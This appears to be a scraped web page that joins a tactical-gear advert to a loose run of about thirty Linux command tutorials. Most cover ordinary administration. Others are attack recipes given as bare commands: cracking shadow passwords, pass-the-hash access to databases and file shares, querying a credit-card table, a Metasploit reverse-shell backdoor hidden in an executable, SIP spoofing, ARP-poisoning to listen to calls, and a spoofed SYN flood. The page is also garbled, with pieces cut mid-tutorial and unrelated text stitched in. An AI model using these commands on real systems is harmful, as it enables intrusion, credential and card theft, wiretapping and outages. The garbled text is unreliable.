Blaze Defense System’s offers a variety of options from various suppliers for tactical gear and accessories.  From bags, pouches, slings, belts, carriers, rigs and custom projects we have the ability to provide anything to the end user.  We carry a full supply of anything you’d need from BDS Tactical allowing you full customized items.  Just tell us what you need and we can supply you with a great price with a lifetime warranty on the product.

 All BDS Tactical gear is Made in the USA!


Debian differs from other distributions that offer John in their repositories because it offers a nice manual page, although upstream doesn't have one. To install, simply type

# aptitude install john

2.2. Fedora


On Fedora, it's also as simple as doing

# yum install john

2.3. Arch Linux

# pacman -S john

2.4. OpenSuse Linux

# zypper install john

2.5. Gentoo


As we said, Gentoo's package is named differently from what others offer, so here you will have to run

# emerge johntheripper

2.6. Slackware


Although there doesn't seem to be a john package in the official repositories, there is a slackbuild that gets John installed on your system (this was tested on Slackware 13.37).


Although we gave you just a few examples on how you can get John on your Linux system, many of the examples presented will run if you have other OS installed: besides source code, the project offers the program for BeOS, Microsoft Windows, Solaris or MacOS X. But for our article, as the title says, we tested the examples on Linux.


3. Using John the Ripper


You need not worry about cryptic configuration files, as John is ready to use with the appropriate command-line flags with no other effort on your part. One word of warning, though: as you already noticed, we tell our readers when they should use root privileges and when they shouldn't. Except when noted, you are strongly recommended to use your normal everyday user (or another, if you prefer, but it shouldn't have super user rights). On my Debian system, John is available as /usr/sbin/john, so if you don't find it we recommend you use whereis and type the whole path when running john unprivileged (or you can simply create an alias).


The simplest way to get your feet wet is to type

$ /usr/sbin/john --test

for doing some tests and benchmarks on John's capabilities. If you have no idea what Kerberos, MD5, DES or Blowfish are, we recommend you start reading some basic security books, because, like we said before, you need some security/administration background. Now, let's create a text file in password format (<user>:<hash>) with a valid hash, of course, and get John to work. You can simply copy a user from /etc/shadow, but we recommend something simpler, because we presume you want to see the results as fast as you can. So create a file named password.txt somewhere inside your /home and put this in it:

myuser:AZl.zWwxIh15Q

Save the file, then simply feed it to John with no arguments (for now):

$ /usr/sbin/john password.txt

We must repeat our warning: password cracking is a CPU-intensive and long process, so depending on your system, that might take quite a while. However, this also depends on what you want to achieve, because if your powerful CPU has been crunching at the password(s) for days with no outcome, it's only safe to say that it's a good password. But if the password is really critical, leave the system until John finishes its' work to make sure everything is alright. Like we said before, this could take many days.


Now, if you have a powerful box with the sole purpose of testing passwords, which is always a good thing given the means, you can try your real-life passwords with John. One way is to use /etc/shadow directly, but we recommend you take a somewhat different course. Note that this applies to systems using shadow passwords, and all the modern Linux distributions do. John offers a nifty utility called unshadow, which we will use to create a file from our passwd and shadow files:

# unshadow /etc/passwd /etc/shadow > mypasswd.txt

Now make sure that mypasswd.txt is available to your normal user and do

$ /usr/sbin/john mypasswd.txt

John will try single crack mode first, then wordlist mode, then incremental. In John's terms, a mode is a method it uses to crack passwords. As you know, there are many kinds of attacks: dictionary attacks, brute force attacks, and so on. Well, this is roughly what John's modes are. As some of you might have realized, wordlist mode is basically a dictionary attack. Besides these three modes enumerated above, John also supports another one called external mode. You can select what mode to use with, for example, --single, --external and so on. We recommend you check out the documentation over at openwall.com for a good but brief description of every mode. But of course we will tell you, in short, what every mode does.


John the Ripper's documentation recommends starting with single crack mode, mostly because it's faster and even faster if you use multiple password files at a time. Incremental mode is the most powerful mode available, as it will try various combinations when cracking, and you can choose what kind of mode (mode applied to the incremental option) to use, including your own. External mode, as the name implies, will use custom functions that you write yourself, while wordlist mode takes a word list specified as an argument to the option (it can be a file with a list of words written one per line, or stdin) and tries a simple dictionary attack on passwords.


If John is succesful in cracking one of the passwords, it will write to ~/.john/john.pot. However, that file isn't human-readable, so you can read cracked passwords with

$ /usr/sbin/john --show mypasswd.txt

To check if the root password got cracked, filter by UID:

$ /usr/sbin/john --show --users=0 mypasswd.txt

Of course, John knows about wildcards and multiple files:

$ /usr/sbin/john --show --users=0 *passwd*

Just as you can filter by user, you can also filter by group, by using the --groups flag, and that filtering is available also when cracking. Going further to wordlist mode, here's how you can use it with the built-in mangling rules enabled:

$ /usr/sbin/john --wordlist=passwd.lst --rules passwd.txt

John also allows you to create multiple named sessions, which is practical, because since John can take lots of time to complete a task, you can later view all sessions running to decide which one to kill. The option for named sessions is --session=taskname and you can use --status or --status=taskname to see all or certain sessions. But there's more: you can restore sessions or particular ones by name using --restore or --restore=taskname. A few examples:

$ /usr/sbin/john --session=allrules --wordlist=all.lst --rules mypasswd.txt $ /usr/sbin/john --status=allrules $ ps aux | grep john #get the PID of the john session you want to kill $ kill HUP $PID_of_john_session_to_kill $ /usr/sbin/john --restore=allrules

Here's some examples of using incremental mode with John:

$ /usr/sbin/john --incremental mypasswd.txt $ /usr/sbin/john --incremental=alpha mypasswd.txt

Of course, this isn't a replacement of John's documentation. Although, as we said, it doesn't offer a manual page, you will find lots of documentation on its' page, as well as a useful wiki. For example, you will notice that even if you're running John on a multiprocessor machine, it will use only one core, usually the first. You can address this problem by reading the documentation and following the instructions there.

                           tutorial #2

configure a virtual network interface.

1. Introduction

Did you know that you can assign more that one IP address to a single physical network interface? This technique is quite useful, for example when working with Apache and virtual hosts, as it allows you to access same Apache server by using two different IP addresses.

2. Temporary virtual network interface

The process of creating a virtual network interface in Linux is a quite simple matter. It involves a single execution of the ifconfig command.

ifconfig eth0:0 123.123.22.22

The above command will create a new virtual network interface based on original eth0 physical interface. The only most important condition for creating the virtual network interface is the physical network interface, as in our case eth0 must exists. The whole example is shown below:

# ifconfig eth0
eth0 Link encap:Ethernet HWaddr 3c:97:0e:02:98:c8
inet addr:192.168.100.23 Bcast:192.168.100.255
Mask:255.255.255.0# ping 192.168.100.23
PING 192.168.100.23 bytes of data.
64 bytes from 192.168.100.23 time=0.023 ms
64 bytes from 192.168.100.23 time=0.059 m

At this point we can configure a new virtual interface based on eth0. Once you execute the ifconfig command the new virtual interface will be immediately ready to use.

# ifconfig eth0:0
eth0:0 Link encap:Ethernet HWaddr 3c:97:0e:02:98:c8
UP BROADCAST MULTICAST MTU:1500 Metric:1
Interrupt:20 Memory:f1600000-f1620000

# ifconfig eth0:0 123.123.22.22
# ifconfig eth0:0
eth0:0 Link encap:Ethernet HWaddr 3c:97:0e:02:98:c8
inet addr:123.123.22.22 Bcast:123.255.255.255 Mask:255.0.0.0# ping 123.123.22.22
PING 123.123.22.22 (123.123.22.22) 56(84) bytes of data.
64 bytes from 123.123.22.22: icmp_req=1 ttl=64 time=0.060 ms
64 bytes from 123.123.22.22: icmp_req=2 ttl=64 time=0.057 ms

2.1.  Disable virtual network interface

To disable our temporary network interface created earlier we can use the ifconfig command again but with a down flag.

# ifconfig eth0:0 down

3. Virtual address permanent assignment

The above configuration would not last after reboot. If you wish the virtual network interface to be permanent you would need to modify config files relevant to your particular Linux distribution. Below, you can find information describing this procedure for the major Linux distributions:

3.1. Debian / Ubuntu

3.1.1. Static

For Debian or Ubuntu Linux you need to edit /etc/network/interfaces file with your favorite text editor and add the following lines:

iface eth0:0 inet static
address 123.123.22.22
netmask 255.0.0.0
broadcast 123.255.255.255

3.1.2. Dhcp

It is also possible to use virtual network interface with DHCP. In that case, you will need to add to your /etc/network/interfaces the following line.

iface eth0:0 inet dhcp

To apply your change restart the network with:

# /etc/init.d/networking restart

3.2. Redhat / Fedora / CentOS

3.2.1. Static

For Redhat, Fedora or CentOS Linux the directory responsible for permanent IP address assignment is /etc/sysconfig/network-scripts. In this directory you need to create a file corresponding to your new virtual interface. In our case, that will be a file called: ifcfg-eth0:0 . Create this new file and insert following lines to make your virtual address assignment permanent after reboot:

DEVICE=eth0:0
IPADDR=123.123.22.22
NETMASK=255.0.0.0
NETWORK=123.0.0.0
BROADCAST=123.255.255.255
ONBOOT=yes

3.2.2. Dhcp

DEVICE=eth0:0
BOOTPROTO=dhcp
ONBOOT=yes

Once ready restart your interfaces with:

# service network restart

4. Conclusion

In the old days one physical server served a single website. This is no longer a viable option for hosting websites today so ability of an operating system to create virtual network interface is really a must.

                                       tutorial #3

How to change MySQL user password from command line using mysqladmin on Linux


# mysqladmin -u root password 'newpass' (enter) # mysqladmin -u root -pnewpass (enter) # mysqladmin -u root -pabc123  

                                     tutorial #4


How to shrink USB clone DD file image output



# sfdisk -l -uM ubuntu_USB.img (enter) # ls -lh ubuntu_USB.img (enter) # fdisk -l -u ubuntu_USB.img (enter) # dd if=ubuntu_USB.img of=ubuntu_USB.iso count=6146047 (enter) # dd if=/dev/sdX of=ubuntu_USB.iso count=6146047 (enter) $ ls -lh ubuntu_USB.iso (enter)

                                    tutorial #5

How to promote Mediawiki user with sysop and bureaucrat privileges

$ mysql -u USER -p PASSWORD

mysql> use wiki

mysql> SELECT user_id, CONVERT(user_name USING utf8) FROM `user`;

mysql> INSERT INTO `user_groups` VALUES (2, 'sysop'),(2, 'bureaucrat');

                                   tutorial #6

How to install SSH Server on Ubuntu 16.04 Xenial Linux

$ sudo apt-get install ssh

$ sudo service ssh start

$ sudo systemctl enable ssh

                                  tutorial #7


How to disable NGINX logging on Linux system


access_log /var/log/nginx/access.log;

error_log /var/log/nginx/error.log;

service nginx reload

                                 tutorial #8


passing-the-hash-Attack

# cat /opt/pth/etc/freetds.conf

# sqsh -S mysql -D master -U demo\\mssql -P hashcodename 

[1] mssql.master.1> select @@version

[1] mssql.master.1> go

[1] mssql.master.1> select * from sys.databases

[1] mssql.master.1> go

[1] mssql.master.1>  use adventureworks2008

[1] mssql.master.1> go

[1] mssql.adventureworks2008.1> select * from information_schema.columns where table name like 'credit card'

[1] mssql.adventureworks2008.1> go

[1] mssql.adventureworks2008.1>select * from sales.creditcard

[1] mssql.adventureworks2008.1> go

[1] mssql.adventureworks2008.1> select * from sales.creditcard where cardtype = 'vista'

[1] mssql.adventureworks2008.1> go

open new terminal

# /opt/pth/bin/firefox

open new terminal 

# mapiprofile -P user -u user -p hashcode -D demo.local -I ipaddress --create

# openchangeclient -p user -S -t otheruser@demo.local -s "command line test with openchange" -B "message"

# exchange2inbox -p user -m mail/user

# alpine 

open new terminal 

# wmic -U demo/administrator\hashcode //ipaddress "select name,processid from win32_process" | less

# wmic -U administrator\hashcode //ipaddress "cmd.exe /c dir c:\ > \windows\temple.txt"

# smbget -w test.local -u demo\\administrator -O smb://ipadress/c$/windows/temp/o.txt -p hashcode

               

                                                                  Sniffing on VoIP Network

1. ./sipdump pass.txt -p aa.pcap

2../svcrack.py -u600 -d list.txt voIPipaddress

dos attack (denial of service attack) the VOIP NETWORK

3. ./iaxflood 192.168.1.13 192.168.1.2 10000

4. msfconsole

5. msf > use auxiliary/scanner/sip/options

6. msf auxiliary(options) > set RHOSTS voIPipaddress

7. msf auxiliary(options) > run

                                       tutorial #9

                                                                 

                  Linux command line to turn off proxy

1. cat /etc/environment

2. env | grep -i proxy

3. man env

4. man set

5. man bash

6. unset HTTP_PROXY

7. gconftool-2 -a /system/http_proxy

8. gconftool-2 -t bool -s /system/http_proxy/use_http_proxy false

9. gconftool-2 -t string -s /system/http_proxy/host "http://newproxy.mydomain.org/"

10. gconftool-2 -t int -s /system/http_proxy/port 8088

11. export http_proxy=

12. echo $http_proxy

                                 tutorial #10

                        How To Set Up SSH Keys

1.ssh-keygen -t rsa

2.ssh-copy-id user@ipaddress

3.cat ~/.ssh/id_rsa.pub | ssh user@ipaddress "mkdir -p ~/.ssh && cat >> ~/.ssh/authorized_keys"

4.sudo nano /etc/ssh/sshd_config

#PermitRootLogin without-password

#reload ssh

                                    tutorial #11

                       xmlrcp attack on wordpress

The WordPress XML-RPC ping attack is pretty annoying.XML-RPC issue can get insane.                       

$ sudo tail -100000 /var/log/apache2/access.log | grep /xmlrpc.php

                                   tutorial #12

   How To Protect WordPress from XML-RPC attacks

$ grep xmlrpc /var/log/apache2/access.log

$ grep xmlrpc /var/log/nginx/access.log

$ sudo a2enconf block-xmlrpc

$ sudo service apache2 restart

$ sudo nano /etc/apache2/sites-available/000-default.conf

$ sudo service apache2 restart

$ sudo nano /etc/nginx/sites-available/example.com

$ sudo service nginx restart

                                     tutorial #13

                         How To Secure HAProxy

HAProxy with Let's Encrypt TLS/SSL Certificate and Auto-renewal

 

     $ sudo apt-get update

    $ sudo apt-get -y install git bc

    $ sudo git clone https://github.com/letsencrypt/letsencrypt /opt/letsencrypt

    $ sudo service haproxy stop

    $ netstat -na | grep ':80.*LISTEN'

    $ cd /opt/letsencrypt

    $ ./letsencrypt-auto certonly --standalone

    Email prompt


   Let's Encrypt Subscriber's Agreement


          Domain name prompt

            $ sudo ls /etc/letsencrypt/live/your_domain_name

            $ sudo mkdir -p /etc/haproxy/certs

            $ sudo -E bash -c 'cat /etc/letsencrypt/live/$DOMAIN/fullchain.pem /etc/letsencrypt/live/$DOMAIN/privkey.pem > /etc/haproxy/certs/$DOMAIN.pem'

           $ sudo chmod -R go-rwx /etc/haproxy/certs

           $ sudo add-apt-repository ppa:vbernat/haproxy-1.6

           $ sudo apt-get update

           $ sudo apt-get install haproxy

           $ sudo nano /etc/haproxy/haproxy.cfg

          $ sudo service haproxy restart

          $ cd /opt/letsencrypt

          $ ./letsencrypt-auto certonly --agree-tos --renew-by-default --standalone-supported-challenges http-01 --http-01-port 54321 -d example.com -d www.example.com

          $ sudo service haproxy reload

          $ sudo cp /opt/letsencrypt/examples/cli.ini /usr/local/etc/le-renew-haproxy.ini

          $ sudo nano /usr/local/etc/le-renew-haproxy.ini

          $ cd /opt/letsencrypt

          $ ./letsencrypt-auto certonly --renew-by-default --config /usr/local/etc/le-renew-haproxy.ini --http-01-port 54321

          $ sudo curl -L -o /usr/local/sbin/le-renew-haproxy https://gist.githubusercontent.com/thisismitch/7c91e9b2b63f837a0c4b/raw/700cfe953e5d5e71e528baf20337198195606630/le-renew-haproxy

          $ sudo chmod +x /usr/local/sbin/le-renew-haproxy

          $ sudo le-renew-haproxy

          $ sudo crontab -e          

                                      tutorial #14

                         Install Apache HTTP Server

$ yum install httpd -y

$ service httpd start

$ chkconfig httpd on

$ vim /etc/sysconfig/iptables

add the following lines:

[….]

-A INPUT -m state –state NEW -m tcp -p tcp –dport 80 -j ACCEPT

[….]

$ service iptables restart

$ netstat -tulpn | grep :80

                                       tutorial #15

                            Install MySQL Server  

 

# yum install mysql mysql-server -y

# service mysqld start

# chkconfig mysqld on

# mysql_secure_installation

                                       tutorial #16

                                  PHP Installation  

 

# yum install php -y

# vi /var/www/html/infophp.php

Add the following lines.

<?php

phpinfo();

?>

# service httpd restart

# yum install php-mysql -y

                                        tutorial #17

                             phpMyAdmin Installation

# wget http://epel.mirror.net.in/epel/6/i386/epel-release-6-8.noarch.rpm

# rpm -Uvh epel-release-6-8.noarch.rpm

# yum install phpmyadmin -y

# vim /etc/httpd/conf.d/phpMyAdmin.conf

# cp /usr/share/phpMyAdmin/config.sample.inc.php /usr/share/phpMyAdmin/config.inc.php

# vim /usr/share/phpMyAdmin/config.inc.php

# service httpd restart

phpmyadmin-installation-01

                             

                                      tutorial #18

                                How to Setup NFS

# yum install nfs-utils nfs-utils-lib

# yum install portmap

# apt-get install nfs-utils nfs-utils-lib

# /etc/init.d/portmap start

# /etc/init.d/nfs start

# chkconfig --level 35 portmap on

# chkconfig --level 35 nfs on

# mkdir /nfsshare

# vi /etc/exports

add this line:

/nfsshare 192.168.0.101(rw,sync,no_root_squash)

# showmount -e 127.0.0.1

# mount -t nfs 127.0.0.1:/nfsshare /mnt/nfsshare

# mount | grep nfs

# vi /etc/fstab

add this line:

127.0.0.1:/nfsshare /mnt nfs defaults 0 0

# cat > /nfsshare/nfstest.txt

# ll /mnt/nfsshare

# umount /mnt/nfsshare

# df -h -F nfs

                                    tutorial  #19

                     restrict sftp user to chroot jail

# groupadd sftpgroup

# usermod -G sftpgroup tecmint

# adduser senthil -g sftpgroup -s /sbin/nologin

# passwd tecmint

# sudo nano /etc/ssh/sshd_config

# systemctl restart sshd

# chmod 700 /home/tecmint

# ssh tecmint@127.0.0.1

# sftp tecmint@127.0.0.1

sftp> pwd

sftp> ls

sftp> cd tecmint

sftp> mkdir test

# groupadd sftpgroup

# mkdir -p /sftpusers/chroot

# chown root:root /sftpusers/chroot/

# adduser tecmint -g sftpgroup -s /sbin/nologin

# passwd tecmint

# mkdir /sftpusers/chroot/tecmint

# chown tecmint:sftpgroup /sftpusers/chroot/tecmint/

# chmod 700 /sftpusers/chroot/tecmint/

# systemctl restart sshd

                                     tutorial #20


                               Create A Backdoor

# msfpayload windows/meterpreter/reverse_tcp LHOST=[local ip]  LPORT=[local port] R | msfencode -e x86/shikata_ga_nai -c 5 -t exe -x /root/Desktop/filename -o /root/Desktop/filename


msf > use exploit/multi/handler

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp

msf exploit(handler) > set LHOST 192.168.62.130

msf exploit(handler) > set LPORT 443

msf exploit(handler) > exploit

                                    tutorial #21

                      How To Add a Non Root User

Kali Linux 2.0 Kali Sana tutorials add user

Kali Linux 2.0 Kali Sana add user

useradd -m newusername -G sudo -s /bin/bash

passwd newusername

                                   tutorial #22

                             Flood network lan

                         in the video down below




 

                             





                                      tutorial #23

                                                                           setup a dummy printer

$ sudo lpadmin -p myprinter -E -v file:///dev/null

$ sudo lpstat -s

$ sudo lpoptions -d myprinter

                                     tutorial #24

                                                           populate a file with random data

$ head -c 1G </dev/urandom >myfile

$ head -c 1073741824 </dev/urandom >myfile

$ dd bs=1024 count=1048576 </dev/urandom >myfile

                                     tutorial #25

                                                                     create a dummy interface

$ /sbin/ip li add dummy0 type dummy

                                     tutorial #26

                  Create a Large Dummy File in Linux

dd if=/dev/zero of=filename bs=1000000000 count=1

du -h filename

                                     tutorial #27

                        SIP Invite Spoof(fake call)

# msfconsole

# msf> use auxiliary/VOIP/SIP_INVITE_SPOOF

# MSF> SHOW OPTIONS

# MSF > SET DOMAIN 15261@SIP.SFLPHONE.ORG

# MSF > SET SCRADDR IPADDRESS

# MSF > SET RHOSTS IPADDRESS/RANGE

# MSF > RUN

                                      tutorial #28                                                               

                           How to sniff VoIP calls

# ettercap -t -m arp -i wlan0 ///

note: then pull up wireshark and goto the interface "wlan0"

and "start" the capture, the hit ctrl+c in terminal and stop the capture

,then goto telephony > voip calls and listen to phone calls

                                     tutorial #29

                   mask ipaddress using OPENvpn


  1. su
  2. mkdir vpncfg
  3. cp -r /usr/share/doc/openvpn/examples/easy-rsa/2.0/* vpncfg/
  4. cd vpncfg/
  5. vim vars
  6. Replace necessary fields in the file.
  7. source vars
  8. ./clean-all
  9. ./build-ca
  10. ./build-key-server nullbytez
  11. Sign the certificate.
  12. ./build-key <name>
  13. ./build-dh
  14. mkdir ~/yourkeys
  15. cd keys/
  16. cp -v ca.crt <name>.{crt,key} ~/yourkeys/
  17. cp -v dh1024.pem nullbytez.{key,crt} ca.crt
  18. echo "1" > /proc/sys/net/ipv4/ip_forward
  19. iptables -t nat -A POSTROUTING -s 10.0.69.0/24 -o eth0 -j MASQUERADE -v
  20. vim /etc/openvpn/openvpn.conf
  21. openvpn client.conf


                                   tutorial #30

                                   ddos attack

#hping3 -V -c 1000000 -d 120 -S -w 64 -p 445 -s 445 --flood --rand-source (Victim IP)